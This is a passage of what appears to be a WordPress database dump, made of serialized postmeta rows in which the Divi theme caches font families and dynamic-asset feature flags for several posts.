italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33694,535,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33695,535,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33690,533,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33691,533,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33692,535,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33693,535,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33686,532,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33687,532,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33688,533,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33689,533,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33682,1350,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33683,1350,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33684,532,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33685,532,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33678,526,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33679,526,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33680,1350,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33681,1350,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33675,525,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33676,526,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33677,526,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33671,524,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33672,525,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33673,525,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33674,525,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33667,523,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33668,524,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33669,524,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33670,524,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33663,522,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33664,523,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33665,523,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33666,523,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33659,521,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33660,522,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33661,522,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33662,522,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33655,520,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33656,521,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33657,521,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33658,521,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33651,519,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33652,520,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33653,520,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33654,520,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33647,518,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33648,519,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33649,519,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33650,519,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33643,516,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33644,518,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33645,518,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33646,518,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enab